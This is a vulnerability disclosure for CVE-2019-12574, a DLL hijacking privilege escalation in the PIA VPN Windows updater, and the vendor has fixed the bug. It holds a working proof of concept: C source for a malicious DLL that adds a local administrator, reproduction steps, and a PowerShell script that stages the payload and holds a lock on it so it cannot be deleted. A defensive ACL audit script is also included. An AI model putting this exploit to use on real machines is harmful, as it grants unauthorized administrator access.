security-research/vulnerabilities/PIA/CVE-2019-12574.txt
Title: PIA Windows Privilege Escalation: DLL Injection
Author: Rich Mirch
CVE: CVE-2019-12574
Vendor Advisory: https://www.privateinternetaccess.com/pages/changelog
Description

A vulnerability in the London Trust Media Private Internet Access (PIA) VPN
Client v1.0 for Windows could allow an authenticated, local attacker to run
arbitrary code with elevated privileges.

The PIA Desktop client is vulnerable to DLL hijacking during the update
process. The updater (the downloaded installer, staged in the update folder)
loads several DLLs from a folder that authenticated users have write access to.
Because the Windows loader resolves a DLL that is not on the KnownDLLs list from
the executable's own directory before it looks in System32, a DLL planted there
under one of those names is loaded instead of the system copy. A low privileged
user can leverage this to execute arbitrary code as an administrator.

When an update is available a low privilege user is notified in the client and is
presented with the option to download it. When clicked, the PIA client sends a
command to the PIA service to download the update. The update is staged in
"C:\ProgramData\Private Internet Access\update\". This directory and all files
within it are removed prior to storing the update file.

A low privileged user can create a file in the update directory and set a lock on
it (an open handle whose share mode does not permit delete), which prevents the
PIA service from deleting it during the download process even though the service
runs as SYSTEM. This can be leveraged to stage a malicious DLL that the update
process will load.

The next time an administrator opens the PIA client a new option to install the
latest version will be available. When clicked, the updater will install the update
and silently execute arbitrary code as the administrator. This PoC demonstrates
that a new administrator named "woot" is added during the update process.
CVSS

Vector: CVSS:3.0/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H/E:F/RL:U/RC:R
Base: 6.7
Temporal: 6.3
The following DLLs are loaded from the update folder by the staged installer
pia-windows-x64-1.0-02176.exe. Any one of them can serve as the hijack target;
this PoC uses spinf.dll.

C:\ProgramData\Private Internet Access\update\spinf.dll
C:\ProgramData\Private Internet Access\update\USERENV.dll
C:\ProgramData\Private Internet Access\update\newdev.dll
C:\ProgramData\Private Internet Access\update\DEVRTL.dll
C:\ProgramData\Private Internet Access\update\DEVOBJ.dll
C:\ProgramData\Private Internet Access\update\drvstore.dll
C:\ProgramData\Private Internet Access\update\PROPSYS.dll
C:\ProgramData\Private Internet Access\update\LINKINFO.dll
C:\ProgramData\Private Internet Access\update\ntshrui.dll
C:\ProgramData\Private Internet Access\update\SspiCli.dll
C:\ProgramData\Private Internet Access\update\srvcli.dll
C:\ProgramData\Private Internet Access\update\cscapi.dll
C:\ProgramData\Private Internet Access\update\CLDAPI.dll
C:\ProgramData\Private Internet Access\update\FLTLIB.DLL
C:\ProgramData\Private Internet Access\update\apphelp.dll
C:\ProgramData\Private Internet Access\update\netutils.dll
Permissions of "c:\ProgramData\Private Internet Access" showing
that BUILTIN\Users has write access. On a directory, FILE_WRITE_DATA and
FILE_APPEND_DATA are the "create file" and "create subdirectory" rights, and
the (CI) flag makes the entry inherit to subfolders such as "update".

c:\ProgramData\Private Internet Access NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
                                       BUILTIN\Administrators:(OI)(CI)(ID)F
                                       CREATOR OWNER:(OI)(CI)(IO)(ID)F
                                       BUILTIN\Users:(OI)(CI)(ID)R
                                       BUILTIN\Users:(CI)(ID)(special access:)
                                                     FILE_WRITE_DATA
                                                     FILE_APPEND_DATA
                                                     FILE_WRITE_EA
                                                     FILE_WRITE_ATTRIBUTES

Permissions of "c:\ProgramData\Private Internet Access\update" showing
that the test1 user has full access (see step 2: test1 created the folder, so
the inheritable CREATOR OWNER entry was materialised for that account).

c:\ProgramData\Private Internet Access\update NT AUTHORITY\SYSTEM:(OI)(CI)(ID)F
                                              BUILTIN\Administrators:(OI)(CI)(ID)F
                                              CHAOS\test1:(ID)F
                                              CREATOR OWNER:(OI)(CI)(IO)(ID)F
                                              BUILTIN\Users:(OI)(CI)(ID)R
                                              BUILTIN\Users:(CI)(ID)(special access:)
                                                            FILE_WRITE_DATA
                                                            FILE_APPEND_DATA
                                                            FILE_WRITE_EA
                                                            FILE_WRITE_ATTRIBUTES
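The two preconditions documented above (a standard-user identity that can create files in the staging folder, and a hijack candidate already sitting there under one of the loaded DLL names) can be checked from PowerShell. The script below is an added example and is not part of the advisory or of PIA's own code; the paths and DLL names are taken from the advisory, while the principal list, the rights mask and the function names are assumptions made here for illustration.

```powershell
# Added example (not from the advisory): audit the PIA staging folder for the
# two preconditions this bug needs. Run as any user; Get-Acl only needs read
# access to the security descriptor.

$StagingRoot = 'C:\ProgramData\Private Internet Access'
$UpdateDir   = Join-Path $StagingRoot 'update'

# Libraries the advisory reports pia-windows-x64-1.0-02176.exe loading from the update folder.
$LoadedDlls = @(
    'spinf.dll','USERENV.dll','newdev.dll','DEVRTL.dll','DEVOBJ.dll','drvstore.dll',
    'PROPSYS.dll','LINKINFO.dll','ntshrui.dll','SspiCli.dll','srvcli.dll','cscapi.dll',
    'CLDAPI.dll','FLTLIB.DLL','apphelp.dll','netutils.dll'
)

# Identities every standard user holds (assumption: extend with your own groups).
$LowPrivPrincipals = @(
    'BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone', 'NT AUTHORITY\INTERACTIVE'
)

# On a directory CreateFiles is FILE_WRITE_DATA and CreateDirectories is
# FILE_APPEND_DATA: the bits that let a user plant a DLL. Get-Acl leaves
# generic rights unmapped, so GENERIC_WRITE (0x40000000) and GENERIC_ALL
# (0x10000000) are included explicitly.
$CreateMask = [int][System.Security.AccessControl.FileSystemRights]::CreateFiles -bor
              [int][System.Security.AccessControl.FileSystemRights]::CreateDirectories -bor
              0x40000000 -bor
              0x10000000

function Get-LowPrivCreateAces {
    # Allow ACEs on $Path that give a low-privileged identity create rights.
    # Inherited ACEs count: inheritance is exactly how "update" got its rights.
    param([Parameter(Mandatory)][string]$Path)
    if (-not (Test-Path -LiteralPath $Path)) { return @() }
    (Get-Acl -LiteralPath $Path).Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $LowPrivPrincipals -contains $_.IdentityReference.Value -and
        (([int]$_.FileSystemRights -band $CreateMask) -ne 0)
    }
}

function Find-StagedDlls {
    # Any of the updater's DLL names already present in $Path, with the owner,
    # so a copy planted by a user stands out from anything SYSTEM wrote.
    param([Parameter(Mandatory)][string]$Path, [Parameter(Mandatory)][string[]]$Names)
    if (-not (Test-Path -LiteralPath $Path)) { return @() }
    foreach ($name in $Names) {
        $file = Join-Path $Path $name
        if (Test-Path -LiteralPath $file) {
            [pscustomobject]@{
                File  = $file
                Owner = (Get-Acl -LiteralPath $file).Owner
                Bytes = (Get-Item -LiteralPath $file).Length
            }
        }
    }
}

function Test-PiaStagingExposure {
    # The parent is checked as well as "update": the service deletes and
    # recreates "update", so the parent's ACL is what the new folder inherits.
    $rootAces   = @(Get-LowPrivCreateAces -Path $StagingRoot)
    $updateAces = @(Get-LowPrivCreateAces -Path $UpdateDir)
    $staged     = @(Find-StagedDlls -Path $UpdateDir -Names $LoadedDlls)
    [pscustomobject]@{
        RootWritableByUsers   = ($rootAces.Count -gt 0)
        UpdateWritableByUsers = ($updateAces.Count -gt 0)
        StagedDlls            = $staged
        Exposed               = ($rootAces.Count -gt 0) -or ($updateAces.Count -gt 0) -or ($staged.Count -gt 0)
    }
}

$result = Test-PiaStagingExposure
$result | Format-List
$result.StagedDlls | Format-Table -AutoSize
```

A hit on RootWritableByUsers alone is enough to be exposed, because the user can create "update" themselves (step 2 of the PoC) and then owns it. Any file in StagedDlls whose owner is not SYSTEM or an administrator should be treated as a planted hijack target.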
Test Environment

OS: Microsoft Windows 10 Pro 10.0.17763 N/A Build 17763
PIA Version: v0.9.9 beta
PIA Upgrade Version: v1.0
Steps to reproduce

All steps are executed as a low privileged user unless otherwise noted.

1) Open a cmd shell and change to the "C:\ProgramData\Private Internet Access" folder.

cd "c:\ProgramData\Private Internet Access"

2) Create the update folder and change to it.

mkdir update
cd update

3) Create a malicious library to create an administrator account named woot when loaded.
/* Cross compile with
   x86_64-w64-mingw32-g++ woot.c -o woot.dll -shared
*/
#include <windows.h>
#include <stdlib.h>   /* system() */

/* Payload: runs once when the updater loads this DLL (DLL_PROCESS_ATTACH),
   in the updater's elevated context, and adds a local administrator. */
BOOL WINAPI DllMain(
    HINSTANCE hinstDLL,
    DWORD fdwReason,
    LPVOID lpReserved )
{
    switch( fdwReason )
    {
        case DLL_PROCESS_ATTACH:
            /* Replace insertpasswordhere with a password that satisfies the local
               password policy, otherwise "net user" fails and no account is created. */
            system("cmd /c net user woot insertpasswordhere /add");
            system("cmd /c net localgroup administrators woot /add");
            break;
        case DLL_THREAD_ATTACH:
            // Do thread-specific initialization.
            break;
        case DLL_THREAD_DETACH:
            // Do thread-specific cleanup.
            break;
        case DLL_PROCESS_DETACH:
            // Perform any necessary cleanup.
            break;
    }
    return TRUE; // Successful DLL_PROCESS_ATTACH.
}
4) Copy the malicious DLL into the update folder. For this PoC we will use spinf.dll
   as the target.

copy woot.dll spinf.dll

5) Execute powershell and set a lock on the spinf.dll file to prevent the library
   from being deleted. I appreciate @poshkatz for teaching me how to easily lock files
   with PowerShell.

$f = [System.IO.File]::Open("spinf.dll",[System.IO.FileMode]::Open,[System.IO.FileAccess]::Read,[System.IO.FileShare]::Read)

   The share mode is the important part: FileShare.Read without FileShare.Delete
   makes every delete attempt fail with a sharing violation while $f stays open,
   regardless of the caller's privileges. .NET resolves the relative path against
   the process working directory, which is the update folder when powershell is
   started from the cmd shell above; pass the full path if in doubt.

6) Verify the lock by typing $f. The output should look like this.
CanRead        : True
CanWrite       : False
CanSeek        : True
IsAsync        : False
Length         : 287283
Name           : c:\ProgramData\Private Internet Access\update\spinf.dll
Position       : 0
Handle         : 880
SafeFileHandle : Microsoft.Win32.SafeHandles.SafeFileHandle
CanTimeout     : False
ReadTimeout    :
WriteTimeout   :
7) Open the PIA client. An update will be available. Click Download v1.0.0.

8) Now that the update is staged, exit all windows and logout.

9) Login as an Administrator.

10) Open the PIA client and click the update icon in the upper right and then
    click the "Install v1.0.0" option. The update will install normally.

11) At this point the "woot" administrator account will exist. Open a cmd shell
    and verify.

net user woot
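The low-privileged half of the procedure (steps 1, 2, 4, 5 and 6) can be driven from a single PowerShell session, which also lets the lock be verified the way the service will experience it, by attempting a delete. The script below is an added example, not code from the advisory; it assumes woot.dll from step 3 is already compiled in the current directory, and the Test-FileLocked helper and the $global:PiaLockHandle name are this example's own. Steps 7 to 11 remain manual clicks in the client and an administrator logon.

```powershell
# Added example (not from the advisory): stage the payload under the name the
# updater loads and hold a delete-blocking handle on it. Assumes woot.dll was
# built as in step 3 and sits in the current directory.

$PayloadDll  = '.\woot.dll'
$TargetName  = 'spinf.dll'                              # any name from the DLL list works
$StagingRoot = 'C:\ProgramData\Private Internet Access'
$updateDir   = Join-Path $StagingRoot 'update'
$target      = Join-Path $updateDir $TargetName

# Steps 1-2: creating the folder ourselves is what gives this user Full control
# on it through the inheritable CREATOR OWNER entry on the parent.
if (-not (Test-Path -LiteralPath $updateDir)) {
    New-Item -ItemType Directory -Path $updateDir | Out-Null
}

# Step 4: stage the payload under the hijack target's name.
Copy-Item -LiteralPath $PayloadDll -Destination $target -Force

# Step 5: open the file with a share mode that omits FileShare.Delete. The handle
# is stored in the global scope so it outlives the script; it must stay open until
# the service has finished clearing the folder and downloading the installer.
$global:PiaLockHandle = [System.IO.File]::Open(
    $target,
    [System.IO.FileMode]::Open,
    [System.IO.FileAccess]::Read,
    [System.IO.FileShare]::Read)

function Test-FileLocked {
    # Tries to delete $Path. With a delete-excluding handle open, File.Delete
    # throws a sharing violation; without one it silently removes the file.
    param([Parameter(Mandatory)][string]$Path)
    try {
        [System.IO.File]::Delete($Path)
        return $false
    } catch {
        return $true
    }
}

# Step 6: verify the lock. Note that a failed lock means the payload is now gone.
if (Test-FileLocked -Path $target) {
    Write-Host "Locked: $target"
    Write-Host "Keep this PowerShell session open, then click Download in the PIA client (step 7)."
    $global:PiaLockHandle | Format-List CanRead, CanWrite, Length, Name
} else {
    Write-Warning "Lock did not hold; $target was deleted. Check the share mode and rerun."
}
```

Closing the session (or calling $global:PiaLockHandle.Close()) releases the lock, so do that only after the download has completed, as in step 8. The same delete-probe technique is useful on the defensive side: an updater that cannot remove every file from its staging folder before downloading should abort rather than continue with a folder it does not fully control.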
Timeline:

2019-01-13: Reported to vendor
2019-01-13: Vendor acknowledged receipt of report
2019-01-22: Vendor released fix in v1.0.1
2019-06-10: Public disclosure